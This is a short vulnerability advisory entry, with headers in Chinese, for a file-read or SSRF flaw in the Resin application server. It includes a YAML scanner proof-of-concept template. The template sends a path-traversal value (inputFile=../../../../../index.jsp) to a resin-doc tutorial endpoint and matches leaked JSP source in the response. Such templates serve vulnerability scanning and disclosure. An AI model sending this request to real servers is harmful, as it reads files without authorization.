resin-inputfile-fileread-or-ssrf: resin inputfile fileread

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

resin inputfile fileread or ssrf

PoC代码[已公开]

id: resin-inputfile-fileread-or-ssrf

info:
  name: resin inputfile fileread
  author: whynot
  severity: high
  verified: true
  description: |-
    resin inputfile fileread or ssrf
  tags: resin,fileread,ssrf
  created: 2023/08/13

rules:
  r0:
    request:
      method: GET
      path: /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp
    expression: response.status == 200 && response.body.bcontains(bytes("<%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %>"))
expression: r0()